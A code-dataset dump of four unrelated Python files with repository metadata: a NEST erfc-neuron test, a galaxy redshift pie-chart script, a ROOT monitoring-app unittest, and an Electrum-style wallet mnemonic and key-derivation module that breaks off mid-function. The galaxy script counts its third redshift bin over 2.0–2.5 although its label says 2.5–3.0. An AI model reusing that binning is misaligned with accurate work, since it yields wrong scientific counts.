# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Test implementation of erfc-neuron.
"""
import unittest
import nest
import numpy as np
from scipy.special import erfc
def get_mean_activity(detector, T):
"""
returns the mean activity of a single binary neuron connected to a spin
detector.
"""
states = nest.GetStatus(detector)[0]['events']['weights']
times = nest.GetStatus(detector)[0]['events']['times']
# add total duration at the end, since we need to take into account
# the time between the last state change and end of simulation
times = np.hstack((times, T))
if len(times) > 1:
assert(states[0] == 1)
# since neuron is starting in 0 state, summing every second period
# will give us the total time in the up state
activity = np.sum(np.diff(times)[::2]) / (T - times[0])
# if we have more than one update, we calculate a more accurate value
# for the mean activity, taking into account that our measurements are
# biased (we only record /given/ that a state change happened)
if len(times) > 2:
# biased average starting at down state, p(m(t)=1|m(t-1)=0)
M0 = 1. - (np.sum(np.diff(times)[1::2]) / (T - times[1]))
# biased average starting at up state, p(m(t)=1|m(t-1)=1)
M1 = activity
# unbiased estimate,
# p(m(t)=1)=\sum_{s \in {0,1}} p(m(t)=1|m(t-1)=s)p(m(t-1)=s),
# assuming stationary state: p(m(t)) = p(m(t-1)), solved for p(m=1)
activity = M0 / (1. + M0 - M1)
return activity
else:
return 0.
def activation_function_theory(sigma, theta):
"""
returns the probability for a binary neuron to be in the up state, given
the parameters sigma and theta.
"""
return 0.5 * erfc(theta / (np.sqrt(2.) * sigma))
class ErfcNeuronTheoryTestCase(unittest.TestCase):
"""Compare results to theoretical predictions"""
def setUp(self):
"""defines parameters of simulation"""
self.sigma = np.logspace(-1, 1.1, 4)
self.theta = np.linspace(-6, 6, 15)
self.neuron = None
self.detector = None
self.T = 30000.
def build_and_connect_nodes(self, sigma, theta):
""" sets up an erfc neuron and spin detector. """
nest.hl_api.set_verbosity('M_WARNING')
nest.ResetKernel()
self.neuron = nest.Create('erfc_neuron', 1,
{'sigma': sigma, 'theta': theta})
self.detector = nest.Create('spin_detector', 1)
nest.Connect(self.neuron, self.detector)
def test_activation_function(self):
"""
simulates erfc neuron for different parameter sets and compares
activity to theoretical value.
"""
for sigma in self.sigma:
for theta in self.theta:
self.build_and_connect_nodes(sigma, theta)
nest.Simulate(self.T)
mean_activity = get_mean_activity(self.detector, self.T)
mean_activity_theory = activation_function_theory(sigma, theta)
delta = np.max([2e-1 * mean_activity_theory *
(1. -
mean_activity_theory),
1e-2])
self.assertAlmostEqual(
mean_activity,
mean_activity_theory,
delta=delta)
def suite():
suite1 = unittest.TestLoader().loadTestsFromTestCase(
ErfcNeuronTheoryTestCase)
return unittest.TestSuite([suite1])
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
|
terhorstd/nest-simulator
|
pynest/nest/tests/test_erfc_neuron.py
|
Python
|
gpl-2.0
| 4,419
|
[
"NEURON"
] |
42013530851eb1af6cec53e2229d93c90ce83889e8ea24bd1093afb35f6e9256
|
#!/usr/bin/env python
# File: plot_histograms3.py
# Created on: Mon Aug 20 22:14:33 2012
# Last Change: Tue Jan 15 16:03:45 2013
# Purpose of script: <+INSERT+>
# Author: Steven Boada
import pylab as pyl
from mk_galaxy_struc import mk_galaxy_struc
galaxies = mk_galaxy_struc()
verylow =[]
low =[]
med=[]
high=[]
appendverylow = verylow.append
appendlow = low.append
appendmed = med.append
appendhigh = high.append
for galaxy in galaxies:
if galaxy.ston_I >=30.:
if 0.04 <= galaxy.ICD_IH and galaxy.ICD_IH <= 0.11:
appendlow(galaxy.z)
if 0.11 <= galaxy.ICD_IH and galaxy.ICD_IH <= 0.18:
appendmed(galaxy.z)
if 0.18 <= galaxy.ICD_IH and galaxy.ICD_IH <= 0.25:
appendhigh(galaxy.z)
else:
appendverylow(galaxy.z)
verylow1 = verylow2=verylow3=verylow4 = 0
low_1 = low_2 = low_3 = low_4 = 0
med_1 = med_2 = med_3 = med_4 = 0
high_1 = high_2 = high_3 = high_4 = 0
for z in verylow:
if 1.5 < z and z < 2.0:
verylow1 +=1
if 2.0 < z and z < 2.5:
verylow2 +=1
if 2.0 < z and z < 2.5:
verylow3 +=1
if 3.0 < z and z < 3.5:
verylow4 +=1
for z in low:
if 1.5 < z and z < 2.0:
low_1 +=1
if 2.0 < z and z < 2.5:
low_2 +=1
if 2.0 < z and z < 2.5:
low_3 +=1
if 3.0 < z and z < 3.5:
low_4 +=1
for z in med:
if 1.5 < z and z < 2.0:
med_1 +=1
if 2.0 < z and z < 2.5:
med_2 +=1
if 2.0 < z and z < 2.5:
med_3 +=1
if 3.0 < z and z < 3.5:
med_4 +=1
for z in high:
if 1.5 < z and z < 2.0:
high_1 +=1
if 2.0 < z and z < 2.5:
high_2 +=1
if 2.0 < z and z < 2.5:
high_3 +=1
if 3.0 < z and z < 3.5:
high_4 +=1
total1 = float(low_1 + med_1 + high_1 +verylow1)
total2 = float(low_2 + med_2 + high_2 +verylow2)
total3 = float(low_3 + med_3 + high_3 +verylow3)
total4 = float(low_4 + med_4 + high_4 +verylow4)
f1, f1s = pyl.subplots(4, 1, figsize=(3,9))
f1s1 = f1s[0]
f1s2 = f1s[1]
f1s3 = f1s[2]
f1s4 = f1s[3]
labels = '1.5 < z < 2.0', '2.0 < z < 2.5', '2.5 < z < 3.0', '3.0 < z < 3.5'
fractions =[verylow1/total1, low_1/total1, med_1/total1, high_1/total1]
f1s1.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
fractions =[verylow2/total2, low_2/total2, med_2/total2, high_2/total2]
f1s2.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
fractions =[verylow3/total3, low_3/total3, med_3/total3, high_3/total3]
f1s3.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
fractions =[verylow4/total4, low_4/total4, med_4/total4, high_4/total4]
f1s4.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
# Tweak the plot.
#pyl.legend(loc='center right')
#pyl.subplots_adjust(left=0.15, bottom=0.15)
#pyl.xlabel("Redshift")
#pyl.ylabel(r"$N/N_{bin}$")
#pyl.savefig('icd_vs_z_hist_IH.eps',bbox='tight')
pyl.show()
|
boada/ICD
|
sandbox/legacy_plot_code/plot_pie_IH.py
|
Python
|
mit
| 2,930
|
[
"Galaxy"
] |
c6453a595a231a0280aa98d94f2f9326dddc190e6943378a663060636ec32ca7
|
import unittest2 as unittest
import ROOT
from monitoring_app import tasks
class TestPages(unittest.TestCase):
def setUp(self):
self.fextension = 'root'
# The fname and keys match those of the data generated by
# `generate_histograms.py`
self.dummy_fname = 'histograms.root'
self.dummy_keys = ['histogram_{0}'.format(i) for i in range(4)]
self.dummy_th1 = ROOT.TH1F('dummy:xtitle:ytitle', 'dummy', 10, 0, 1)
self.dummy_th1.FillRandom('gaus', 1000)
def tearDown(self):
# Delete TH1 so we don't create multiple instances with the same name
del self.dummy_th1
def test_add_file_extension(self):
"""Extension is added to a filename when not present."""
fname = 'filename'
fname_expected = '{0}.{1}'.format(fname, self.fextension)
assert tasks.add_file_extension(fname) == fname_expected
def test_dont_add_file_extension_again(self):
"""Extension is not added to a filename if already present."""
fname = 'filename.{0}'.format(self.fextension)
assert tasks.add_file_extension(fname) == fname
def test_data_for_th1f(self):
"""Appropriate information is provided on TH1F ROOT objects."""
data = tasks.data_for_object(self.dummy_th1)
for key in ('binning', 'values', 'uncertainties', 'axis_titles'):
assert key in data
nbins = self.dummy_th1.GetNbinsX()
assert len(data['binning']) == nbins
assert len(data['values']) == nbins
assert len(data['uncertainties']) == nbins
assert len(data['axis_titles']) == 2
assert data['axis_titles'][0] == self.dummy_th1.GetXaxis().GetTitle()
assert data['axis_titles'][1] == self.dummy_th1.GetYaxis().GetTitle()
def test_data_for_unknown_tobject(self):
"""No information should be returned for unsupported ROOT objects."""
# Use a child of TObject that we don't support
obj = ROOT.TH3D()
data = tasks.data_for_object(obj)
assert not data
def test_get_key_from_file(self):
"""Dictionary describing key in file is returned."""
data = tasks.get_key_from_file(self.dummy_fname, self.dummy_keys[0])
for k in ('success', 'data'):
assert k in data
data_data = data['data']
assert data['success'] == True
assert data_data
for k in ('filename', 'key_name', 'key_title', 'key_class', 'key_data'):
assert k in data_data
assert data_data['filename'].endswith(self.dummy_fname)
assert data_data['key_name'] == self.dummy_keys[0]
assert data_data['key_title'] == 'Gaussian'
assert data_data['key_class'] == 'TH1F'
def test_get_key_from_file_invalid_filename(self):
"""Error dictionary is returned with message."""
# As this test intentionally tries to open a non-existent file, which
# ROOT would by default print an error about, temporarily change the
# logging level to suppress such a message
originalErrorIgnoreLevel = ROOT.gErrorIgnoreLevel
ROOT.gErrorIgnoreLevel = ROOT.kFatal
data = tasks.get_key_from_file('fake_file.root', self.dummy_keys[0])
ROOT.gErrorIgnoreLevel = originalErrorIgnoreLevel
for k in ('success', 'message'):
assert k in data
assert 'data' not in data
assert data['success'] == False
assert data['message'].startswith('Could not open')
def test_get_key_from_file_invalid_key_name(self):
"""Error dictionary is returned with message."""
data = tasks.get_key_from_file(self.dummy_fname, 'fake_key')
for k in ('success', 'message'):
assert k in data
assert 'data' not in data
assert data['success'] == False
assert data['message'].startswith('Could not find')
if __name__ == '__main__':
unittest.main()
|
alexpearce/example-monitoring-app
|
tests/test_tasks.py
|
Python
|
mit
| 3,930
|
[
"Gaussian"
] |
9c4a576ad1275b8089e197e5fc5482f168da960dc7bc03dac5ffc99a4ae5b5ba
|
import ecdsa
import hashlib, base64, ecdsa, re
import hmac
import subprocess
import thread
import random
import urllib
from ecdsa.curves import SECP256k1
from ecdsa.util import string_to_number, number_to_string
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# list of words from http://en.wiktionary.org/wiki/Wiktionary:Frequency_lists/Contemporary_poetry
words = [
"like",
"just",
"love",
"know",
"never",
"want",
"time",
"out",
"there",
"make",
"look",
"eye",
"down",
"only",
"think",
"heart",
"back",
"then",
"into",
"about",
"more",
"away",
"still",
"them",
"take",
"thing",
"even",
"through",
"long",
"always",
"world",
"too",
"friend",
"tell",
"try",
"hand",
"thought",
"over",
"here",
"other",
"need",
"smile",
"again",
"much",
"cry",
"been",
"night",
"ever",
"little",
"said",
"end",
"some",
"those",
"around",
"mind",
"people",
"girl",
"leave",
"dream",
"left",
"turn",
"myself",
"give",
"nothing",
"really",
"off",
"before",
"something",
"find",
"walk",
"wish",
"good",
"once",
"place",
"ask",
"stop",
"keep",
"watch",
"seem",
"everything",
"wait",
"got",
"yet",
"made",
"remember",
"start",
"alone",
"run",
"hope",
"maybe",
"believe",
"body",
"hate",
"after",
"close",
"talk",
"stand",
"own",
"each",
"hurt",
"help",
"home",
"god",
"soul",
"new",
"many",
"two",
"inside",
"should",
"true",
"first",
"fear",
"mean",
"better",
"play",
"another",
"gone",
"change",
"use",
"wonder",
"someone",
"hair",
"cold",
"open",
"best",
"any",
"behind",
"happen",
"water",
"dark",
"laugh",
"stay",
"forever",
"name",
"work",
"show",
"sky",
"break",
"came",
"deep",
"door",
"put",
"black",
"together",
"upon",
"happy",
"such",
"great",
"white",
"matter",
"fill",
"past",
"please",
"burn",
"cause",
"enough",
"touch",
"moment",
"soon",
"voice",
"scream",
"anything",
"stare",
"sound",
"red",
"everyone",
"hide",
"kiss",
"truth",
"death",
"beautiful",
"mine",
"blood",
"broken",
"very",
"pass",
"next",
"forget",
"tree",
"wrong",
"air",
"mother",
"understand",
"lip",
"hit",
"wall",
"memory",
"sleep",
"free",
"high",
"realize",
"school",
"might",
"skin",
"sweet",
"perfect",
"blue",
"kill",
"breath",
"dance",
"against",
"fly",
"between",
"grow",
"strong",
"under",
"listen",
"bring",
"sometimes",
"speak",
"pull",
"person",
"become",
"family",
"begin",
"ground",
"real",
"small",
"father",
"sure",
"feet",
"rest",
"young",
"finally",
"land",
"across",
"today",
"different",
"guy",
"line",
"fire",
"reason",
"reach",
"second",
"slowly",
"write",
"eat",
"smell",
"mouth",
"step",
"learn",
"three",
"floor",
"promise",
"breathe",
"darkness",
"push",
"earth",
"guess",
"save",
"song",
"above",
"along",
"both",
"color",
"house",
"almost",
"sorry",
"anymore",
"brother",
"okay",
"dear",
"game",
"fade",
"already",
"apart",
"warm",
"beauty",
"heard",
"notice",
"question",
"shine",
"began",
"piece",
"whole",
"shadow",
"secret",
"street",
"within",
"finger",
"point",
"morning",
"whisper",
"child",
"moon",
"green",
"story",
"glass",
"kid",
"silence",
"since",
"soft",
"yourself",
"empty",
"shall",
"angel",
"answer",
"baby",
"bright",
"dad",
"path",
"worry",
"hour",
"drop",
"follow",
"power",
"war",
"half",
"flow",
"heaven",
"act",
"chance",
"fact",
"least",
"tired",
"children",
"near",
"quite",
"afraid",
"rise",
"sea",
"taste",
"window",
"cover",
"nice",
"trust",
"lot",
"sad",
"cool",
"force",
"peace",
"return",
"blind",
"easy",
"ready",
"roll",
"rose",
"drive",
"held",
"music",
"beneath",
"hang",
"mom",
"paint",
"emotion",
"quiet",
"clear",
"cloud",
"few",
"pretty",
"bird",
"outside",
"paper",
"picture",
"front",
"rock",
"simple",
"anyone",
"meant",
"reality",
"road",
"sense",
"waste",
"bit",
"leaf",
"thank",
"happiness",
"meet",
"men",
"smoke",
"truly",
"decide",
"self",
"age",
"book",
"form",
"alive",
"carry",
"escape",
"damn",
"instead",
"able",
"ice",
"minute",
"throw",
"catch",
"leg",
"ring",
"course",
"goodbye",
"lead",
"poem",
"sick",
"corner",
"desire",
"known",
"problem",
"remind",
"shoulder",
"suppose",
"toward",
"wave",
"drink",
"jump",
"woman",
"pretend",
"sister",
"week",
"human",
"joy",
"crack",
"grey",
"pray",
"surprise",
"dry",
"knee",
"less",
"search",
"bleed",
"caught",
"clean",
"embrace",
"future",
"king",
"son",
"sorrow",
"chest",
"hug",
"remain",
"sat",
"worth",
"blow",
"daddy",
"final",
"parent",
"tight",
"also",
"create",
"lonely",
"safe",
"cross",
"dress",
"evil",
"silent",
"bone",
"fate",
"perhaps",
"anger",
"class",
"scar",
"snow",
"tiny",
"tonight",
"continue",
"control",
"dog",
"edge",
"mirror",
"month",
"suddenly",
"comfort",
"given",
"loud",
"quickly",
"gaze",
"plan",
"rush",
"stone",
"town",
"battle",
"ignore",
"spirit",
"stood",
"stupid",
"yours",
"brown",
"build",
"dust",
"hey",
"kept",
"pay",
"phone",
"twist",
"although",
"ball",
"beyond",
"hidden",
"nose",
"taken",
"fail",
"float",
"pure",
"somehow",
"wash",
"wrap",
"angry",
"cheek",
"creature",
"forgotten",
"heat",
"rip",
"single",
"space",
"special",
"weak",
"whatever",
"yell",
"anyway",
"blame",
"job",
"choose",
"country",
"curse",
"drift",
"echo",
"figure",
"grew",
"laughter",
"neck",
"suffer",
"worse",
"yeah",
"disappear",
"foot",
"forward",
"knife",
"mess",
"somewhere",
"stomach",
"storm",
"beg",
"idea",
"lift",
"offer",
"breeze",
"field",
"five",
"often",
"simply",
"stuck",
"win",
"allow",
"confuse",
"enjoy",
"except",
"flower",
"seek",
"strength",
"calm",
"grin",
"gun",
"heavy",
"hill",
"large",
"ocean",
"shoe",
"sigh",
"straight",
"summer",
"tongue",
"accept",
"crazy",
"everyday",
"exist",
"grass",
"mistake",
"sent",
"shut",
"surround",
"table",
"ache",
"brain",
"destroy",
"heal",
"nature",
"shout",
"sign",
"stain",
"choice",
"doubt",
"glance",
"glow",
"mountain",
"queen",
"stranger",
"throat",
"tomorrow",
"city",
"either",
"fish",
"flame",
"rather",
"shape",
"spin",
"spread",
"ash",
"distance",
"finish",
"image",
"imagine",
"important",
"nobody",
"shatter",
"warmth",
"became",
"feed",
"flesh",
"funny",
"lust",
"shirt",
"trouble",
"yellow",
"attention",
"bare",
"bite",
"money",
"protect",
"amaze",
"appear",
"born",
"choke",
"completely",
"daughter",
"fresh",
"friendship",
"gentle",
"probably",
"six",
"deserve",
"expect",
"grab",
"middle",
"nightmare",
"river",
"thousand",
"weight",
"worst",
"wound",
"barely",
"bottle",
"cream",
"regret",
"relationship",
"stick",
"test",
"crush",
"endless",
"fault",
"itself",
"rule",
"spill",
"art",
"circle",
"join",
"kick",
"mask",
"master",
"passion",
"quick",
"raise",
"smooth",
"unless",
"wander",
"actually",
"broke",
"chair",
"deal",
"favorite",
"gift",
"note",
"number",
"sweat",
"box",
"chill",
"clothes",
"lady",
"mark",
"park",
"poor",
"sadness",
"tie",
"animal",
"belong",
"brush",
"consume",
"dawn",
"forest",
"innocent",
"pen",
"pride",
"stream",
"thick",
"clay",
"complete",
"count",
"draw",
"faith",
"press",
"silver",
"struggle",
"surface",
"taught",
"teach",
"wet",
"bless",
"chase",
"climb",
"enter",
"letter",
"melt",
"metal",
"movie",
"stretch",
"swing",
"vision",
"wife",
"beside",
"crash",
"forgot",
"guide",
"haunt",
"joke",
"knock",
"plant",
"pour",
"prove",
"reveal",
"steal",
"stuff",
"trip",
"wood",
"wrist",
"bother",
"bottom",
"crawl",
"crowd",
"fix",
"forgive",
"frown",
"grace",
"loose",
"lucky",
"party",
"release",
"surely",
"survive",
"teacher",
"gently",
"grip",
"speed",
"suicide",
"travel",
"treat",
"vein",
"written",
"cage",
"chain",
"conversation",
"date",
"enemy",
"however",
"interest",
"million",
"page",
"pink",
"proud",
"sway",
"themselves",
"winter",
"church",
"cruel",
"cup",
"demon",
"experience",
"freedom",
"pair",
"pop",
"purpose",
"respect",
"shoot",
"softly",
"state",
"strange",
"bar",
"birth",
"curl",
"dirt",
"excuse",
"lord",
"lovely",
"monster",
"order",
"pack",
"pants",
"pool",
"scene",
"seven",
"shame",
"slide",
"ugly",
"among",
"blade",
"blonde",
"closet",
"creek",
"deny",
"drug",
"eternity",
"gain",
"grade",
"handle",
"key",
"linger",
"pale",
"prepare",
"swallow",
"swim",
"tremble",
"wheel",
"won",
"cast",
"cigarette",
"claim",
"college",
"direction",
"dirty",
"gather",
"ghost",
"hundred",
"loss",
"lung",
"orange",
"present",
"swear",
"swirl",
"twice",
"wild",
"bitter",
"blanket",
"doctor",
"everywhere",
"flash",
"grown",
"knowledge",
"numb",
"pressure",
"radio",
"repeat",
"ruin",
"spend",
"unknown",
"buy",
"clock",
"devil",
"early",
"false",
"fantasy",
"pound",
"precious",
"refuse",
"sheet",
"teeth",
"welcome",
"add",
"ahead",
"block",
"bury",
"caress",
"content",
"depth",
"despite",
"distant",
"marry",
"purple",
"threw",
"whenever",
"bomb",
"dull",
"easily",
"grasp",
"hospital",
"innocence",
"normal",
"receive",
"reply",
"rhyme",
"shade",
"someday",
"sword",
"toe",
"visit",
"asleep",
"bought",
"center",
"consider",
"flat",
"hero",
"history",
"ink",
"insane",
"muscle",
"mystery",
"pocket",
"reflection",
"shove",
"silently",
"smart",
"soldier",
"spot",
"stress",
"train",
"type",
"view",
"whether",
"bus",
"energy",
"explain",
"holy",
"hunger",
"inch",
"magic",
"mix",
"noise",
"nowhere",
"prayer",
"presence",
"shock",
"snap",
"spider",
"study",
"thunder",
"trail",
"admit",
"agree",
"bag",
"bang",
"bound",
"butterfly",
"cute",
"exactly",
"explode",
"familiar",
"fold",
"further",
"pierce",
"reflect",
"scent",
"selfish",
"sharp",
"sink",
"spring",
"stumble",
"universe",
"weep",
"women",
"wonderful",
"action",
"ancient",
"attempt",
"avoid",
"birthday",
"branch",
"chocolate",
"core",
"depress",
"drunk",
"especially",
"focus",
"fruit",
"honest",
"match",
"palm",
"perfectly",
"pillow",
"pity",
"poison",
"roar",
"shift",
"slightly",
"thump",
"truck",
"tune",
"twenty",
"unable",
"wipe",
"wrote",
"coat",
"constant",
"dinner",
"drove",
"egg",
"eternal",
"flight",
"flood",
"frame",
"freak",
"gasp",
"glad",
"hollow",
"motion",
"peer",
"plastic",
"root",
"screen",
"season",
"sting",
"strike",
"team",
"unlike",
"victim",
"volume",
"warn",
"weird",
"attack",
"await",
"awake",
"built",
"charm",
"crave",
"despair",
"fought",
"grant",
"grief",
"horse",
"limit",
"message",
"ripple",
"sanity",
"scatter",
"serve",
"split",
"string",
"trick",
"annoy",
"blur",
"boat",
"brave",
"clearly",
"cling",
"connect",
"fist",
"forth",
"imagination",
"iron",
"jock",
"judge",
"lesson",
"milk",
"misery",
"nail",
"naked",
"ourselves",
"poet",
"possible",
"princess",
"sail",
"size",
"snake",
"society",
"stroke",
"torture",
"toss",
"trace",
"wise",
"bloom",
"bullet",
"cell",
"check",
"cost",
"darling",
"during",
"footstep",
"fragile",
"hallway",
"hardly",
"horizon",
"invisible",
"journey",
"midnight",
"mud",
"nod",
"pause",
"relax",
"shiver",
"sudden",
"value",
"youth",
"abuse",
"admire",
"blink",
"breast",
"bruise",
"constantly",
"couple",
"creep",
"curve",
"difference",
"dumb",
"emptiness",
"gotta",
"honor",
"plain",
"planet",
"recall",
"rub",
"ship",
"slam",
"soar",
"somebody",
"tightly",
"weather",
"adore",
"approach",
"bond",
"bread",
"burst",
"candle",
"coffee",
"cousin",
"crime",
"desert",
"flutter",
"frozen",
"grand",
"heel",
"hello",
"language",
"level",
"movement",
"pleasure",
"powerful",
"random",
"rhythm",
"settle",
"silly",
"slap",
"sort",
"spoken",
"steel",
"threaten",
"tumble",
"upset",
"aside",
"awkward",
"bee",
"blank",
"board",
"button",
"card",
"carefully",
"complain",
"crap",
"deeply",
"discover",
"drag",
"dread",
"effort",
"entire",
"fairy",
"giant",
"gotten",
"greet",
"illusion",
"jeans",
"leap",
"liquid",
"march",
"mend",
"nervous",
"nine",
"replace",
"rope",
"spine",
"stole",
"terror",
"accident",
"apple",
"balance",
"boom",
"childhood",
"collect",
"demand",
"depression",
"eventually",
"faint",
"glare",
"goal",
"group",
"honey",
"kitchen",
"laid",
"limb",
"machine",
"mere",
"mold",
"murder",
"nerve",
"painful",
"poetry",
"prince",
"rabbit",
"shelter",
"shore",
"shower",
"soothe",
"stair",
"steady",
"sunlight",
"tangle",
"tease",
"treasure",
"uncle",
"begun",
"bliss",
"canvas",
"cheer",
"claw",
"clutch",
"commit",
"crimson",
"crystal",
"delight",
"doll",
"existence",
"express",
"fog",
"football",
"gay",
"goose",
"guard",
"hatred",
"illuminate",
"mass",
"math",
"mourn",
"rich",
"rough",
"skip",
"stir",
"student",
"style",
"support",
"thorn",
"tough",
"yard",
"yearn",
"yesterday",
"advice",
"appreciate",
"autumn",
"bank",
"beam",
"bowl",
"capture",
"carve",
"collapse",
"confusion",
"creation",
"dove",
"feather",
"girlfriend",
"glory",
"government",
"harsh",
"hop",
"inner",
"loser",
"moonlight",
"neighbor",
"neither",
"peach",
"pig",
"praise",
"screw",
"shield",
"shimmer",
"sneak",
"stab",
"subject",
"throughout",
"thrown",
"tower",
"twirl",
"wow",
"army",
"arrive",
"bathroom",
"bump",
"cease",
"cookie",
"couch",
"courage",
"dim",
"guilt",
"howl",
"hum",
"husband",
"insult",
"led",
"lunch",
"mock",
"mostly",
"natural",
"nearly",
"needle",
"nerd",
"peaceful",
"perfection",
"pile",
"price",
"remove",
"roam",
"sanctuary",
"serious",
"shiny",
"shook",
"sob",
"stolen",
"tap",
"vain",
"void",
"warrior",
"wrinkle",
"affection",
"apologize",
"blossom",
"bounce",
"bridge",
"cheap",
"crumble",
"decision",
"descend",
"desperately",
"dig",
"dot",
"flip",
"frighten",
"heartbeat",
"huge",
"lazy",
"lick",
"odd",
"opinion",
"process",
"puzzle",
"quietly",
"retreat",
"score",
"sentence",
"separate",
"situation",
"skill",
"soak",
"square",
"stray",
"taint",
"task",
"tide",
"underneath",
"veil",
"whistle",
"anywhere",
"bedroom",
"bid",
"bloody",
"burden",
"careful",
"compare",
"concern",
"curtain",
"decay",
"defeat",
"describe",
"double",
"dreamer",
"driver",
"dwell",
"evening",
"flare",
"flicker",
"grandma",
"guitar",
"harm",
"horrible",
"hungry",
"indeed",
"lace",
"melody",
"monkey",
"nation",
"object",
"obviously",
"rainbow",
"salt",
"scratch",
"shown",
"shy",
"stage",
"stun",
"third",
"tickle",
"useless",
"weakness",
"worship",
"worthless",
"afternoon",
"beard",
"boyfriend",
"bubble",
"busy",
"certain",
"chin",
"concrete",
"desk",
"diamond",
"doom",
"drawn",
"due",
"felicity",
"freeze",
"frost",
"garden",
"glide",
"harmony",
"hopefully",
"hunt",
"jealous",
"lightning",
"mama",
"mercy",
"peel",
"physical",
"position",
"pulse",
"punch",
"quit",
"rant",
"respond",
"salty",
"sane",
"satisfy",
"savior",
"sheep",
"slept",
"social",
"sport",
"tuck",
"utter",
"valley",
"wolf",
"aim",
"alas",
"alter",
"arrow",
"awaken",
"beaten",
"belief",
"brand",
"ceiling",
"cheese",
"clue",
"confidence",
"connection",
"daily",
"disguise",
"eager",
"erase",
"essence",
"everytime",
"expression",
"fan",
"flag",
"flirt",
"foul",
"fur",
"giggle",
"glorious",
"ignorance",
"law",
"lifeless",
"measure",
"mighty",
"muse",
"north",
"opposite",
"paradise",
"patience",
"patient",
"pencil",
"petal",
"plate",
"ponder",
"possibly",
"practice",
"slice",
"spell",
"stock",
"strife",
"strip",
"suffocate",
"suit",
"tender",
"tool",
"trade",
"velvet",
"verse",
"waist",
"witch",
"aunt",
"bench",
"bold",
"cap",
"certainly",
"click",
"companion",
"creator",
"dart",
"delicate",
"determine",
"dish",
"dragon",
"drama",
"drum",
"dude",
"everybody",
"feast",
"forehead",
"former",
"fright",
"fully",
"gas",
"hook",
"hurl",
"invite",
"juice",
"manage",
"moral",
"possess",
"raw",
"rebel",
"royal",
"scale",
"scary",
"several",
"slight",
"stubborn",
"swell",
"talent",
"tea",
"terrible",
"thread",
"torment",
"trickle",
"usually",
"vast",
"violence",
"weave",
"acid",
"agony",
"ashamed",
"awe",
"belly",
"blend",
"blush",
"character",
"cheat",
"common",
"company",
"coward",
"creak",
"danger",
"deadly",
"defense",
"define",
"depend",
"desperate",
"destination",
"dew",
"duck",
"dusty",
"embarrass",
"engine",
"example",
"explore",
"foe",
"freely",
"frustrate",
"generation",
"glove",
"guilty",
"health",
"hurry",
"idiot",
"impossible",
"inhale",
"jaw",
"kingdom",
"mention",
"mist",
"moan",
"mumble",
"mutter",
"observe",
"ode",
"pathetic",
"pattern",
"pie",
"prefer",
"puff",
"rape",
"rare",
"revenge",
"rude",
"scrape",
"spiral",
"squeeze",
"strain",
"sunset",
"suspend",
"sympathy",
"thigh",
"throne",
"total",
"unseen",
"weapon",
"weary"
]
n = 1626
# Note about US patent no 5892470: Here each word does not represent a given digit.
# Instead, the digit represented by a word is variable, it depends on the previous word.
def mn_encode( message ):
out = []
for i in range(len(message)/8):
word = message[8*i:8*i+8]
x = int(word, 16)
w1 = (x%n)
w2 = ((x/n) + w1)%n
w3 = ((x/n/n) + w2)%n
out += [ words[w1], words[w2], words[w3] ]
return out
def mn_decode( wlist ):
out = ''
for i in range(len(wlist)/3):
word1, word2, word3 = wlist[3*i:3*i+3]
w1 = words.index(word1)
w2 = (words.index(word2))%n
w3 = (words.index(word3))%n
x = w1 +n*((w2-w1)%n) +n*n*((w3-w2)%n)
out += '%08x'%x
return out
def stretch_key(seed):
oldseed = seed
for i in range(100000):
seed = hashlib.sha256(seed + oldseed).digest()
return string_to_number( seed )
def mpk_from_seed(seed):
curve = SECP256k1
secexp = stretch_key(seed)
master_private_key = ecdsa.SigningKey.from_secret_exponent( secexp, curve = SECP256k1 )
master_public_key = master_private_key.get_verifying_key().to_string().encode('hex')
return master_public_key
class Account(object):
def __init__(self, v):
self.addresses = v.get('0', [])
self.change = v.get('1', [])
def dump(self):
return {'0':self.addresses, '1':self.change}
def get_addresses(self, for_change):
return self.change[:] if for_change else self.addresses[:]
def create_new_address(self, for_change):
addresses = self.change if for_change else self.addresses
n = len(addresses)
address = self.get_address( for_change, n)
addresses.append(address)
return address
def get_address(self, for_change, n):
pass
def get_pubkeys(self, sequence):
return [ self.get_pubkey( *sequence )]
class OldAccount(Account):
""" Privatekey(type,n) = Master_private_key + H(n|S|type) """
def __init__(self, v):
self.addresses = v.get(0, [])
self.change = v.get(1, [])
self.mpk = v['mpk'].decode('hex')
def dump(self):
return {0:self.addresses, 1:self.change}
@classmethod
def mpk_from_seed(klass, seed):
curve = SECP256k1
secexp = klass.stretch_key(seed)
master_private_key = ecdsa.SigningKey.from_secret_exponent( secexp, curve = SECP256k1 )
master_public_key = master_private_key.get_verifying_key().to_string().encode('hex')
return master_public_key
@classmethod
def stretch_key(self,seed):
oldseed = seed
for i in range(100000):
seed = hashlib.sha256(seed + oldseed).digest()
return string_to_number( seed )
def get_sequence(self, for_change, n):
return string_to_number( Hash( "%d:%d:"%(n,for_change) + self.mpk ) )
def get_address(self, for_change, n):
pubkey = self.get_pubkey(for_change, n)
address = public_key_to_bc_address( pubkey.decode('hex') )
return address
def get_pubkey(self, for_change, n):
curve = SECP256k1
mpk = self.mpk
z = self.get_sequence(for_change, n)
master_public_key = ecdsa.VerifyingKey.from_string( mpk, curve = SECP256k1 )
pubkey_point = master_public_key.pubkey.point + z*curve.generator
public_key2 = ecdsa.VerifyingKey.from_public_point( pubkey_point, curve = SECP256k1 )
